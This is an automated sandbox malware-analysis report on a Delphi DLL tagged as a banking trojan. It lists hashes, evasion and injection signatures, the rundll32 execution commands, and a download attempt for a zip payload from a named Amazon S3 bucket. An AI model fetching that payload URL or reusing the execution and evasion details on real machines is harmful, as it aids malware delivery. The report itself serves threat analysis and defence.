Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
decrypt-main.dll.dll

Overview

General Information

Sample name:decrypt-main.dll.dll
(renamed file extension from exe to dll)
Original sample name:decrypt-main.dll.exe
Analysis ID:1408464
MD5:1715ba4aa4ff4c70e66943076f3236ac
SHA1:f57bfbe116f915e5525c5eff36b5eb5969282171
SHA256:faebf87c3ff1345bbd5910fe4633b2b49dc83fe62b400ecaa102594d5edb39f0
Tags:bankerexetrojan
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries keyboard layouts
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7456 cmdline: loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7508 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7532 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • WerFault.exe (PID: 7624 cmdline: C:\Windows\system32\WerFault.exe -u -p 7532 -s 476 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7516 cmdline: rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7776 cmdline: C:\Windows\system32\WerFault.exe -u -p 7516 -s 2004 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7808 cmdline: rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7924 cmdline: rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7968 cmdline: C:\Windows\system32\WerFault.exe -u -p 7924 -s 448 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 8024 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 8032 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 8048 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 8068 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 8164 cmdline: C:\Windows\system32\WerFault.exe -u -p 8068 -s 472 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 8084 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: decrypt-main.dll.dllReversingLabs: Detection: 62%
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
Source: unknownHTTPS traffic detected: 16.12.1.62:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00415080 FindFirstFileW,FindClose,3_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 4_1_00415080 FindFirstFileW,4_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00415080 FindFirstFileW,FindClose,10_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00415080 FindFirstFileW,FindClose,14_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 15_2_00415080 FindFirstFileW,FindClose,15_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 15_1_00415080 FindFirstFileW,15_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 17_1_00415080 FindFirstFileW,17_1_00415080
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_27d8c3fe9e4ce467db0e38d9cdded62657c28_b4dfb63c_1035b44d-43cf-4336-9f4b-7f94949dfc2c\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueueJump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_e26d2cbdf0ab1647723bb3a38bd2737c2e0af57_b4dfb63c_e5ced0b6-a51a-4527-9ac5-1082608266c4\Jump to behavior

Networking

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 16.12.1.62 443Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /bucketPc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00815B40 Sleep,SleepEx,URLDownloadToFileW,Sleep,3_2_00815B40
Source: global trafficHTTP traffic detected: GET /bucketPc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: bucreate203920233.s3.sa-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundx-amz-request-id: TKB5CKH123017SA6x-amz-id-2: aTk7n8ul0eLKfek03zQ+rqk8WoPYFkzu5x5+WZ+osLOxsf8k/+vYXVouPUpp2T94AENI8+MgxYY=Content-Type: application/xmlTransfer-Encoding: chunkedDate: Wed, 13 Mar 2024 15:50:59 GMTServer: AmazonS3Connection: close
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, rundll32.exe, 00000011.00000002.1839230847.0000000000428000.00000020.00000001.01000000.00000003.sdmp, decrypt-main.dll.dllString found in binary or memory: http://www.delphiforfun.org/
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/:
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/R
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836690410.000001B71BA3F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1838394731.000001B71C05B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipJ
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipqJ
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipx7E
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip~K
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownHTTPS traffic detected: 16.12.1.62:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00414B503_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 3_2_004382203_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00414B5010_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0043822010_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00414B5014_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0043822014_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: 15_2_00414B5015_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 15_2_0043822015_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: String function: 004208C0 appears 96 times
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 476
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: classification engineClassification label: mal56.evad.winDLL@26/17@1/1
Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic ShellJump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8068
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7532
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7516
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\cc51e6fa-75b0-49f4-8ca7-6b61f342595aJump to behavior
Source: decrypt-main.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
Source: decrypt-main.dll.dllReversingLabs: Detection: 62%
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 476
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7516 -s 2004
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 448
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8068 -s 472
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheckJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMainJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheckJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMainJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddrJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapperJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
Source: decrypt-main.dll.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: decrypt-main.dll.dllStatic file information: File size 5330944 > 1048576
Source: decrypt-main.dll.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x424000
Source: decrypt-main.dll.dllStatic PE information: section name: .didata
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0088E638 push rax; ret 14_2_0088E661
Source: C:\Windows\System32\loaddll64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
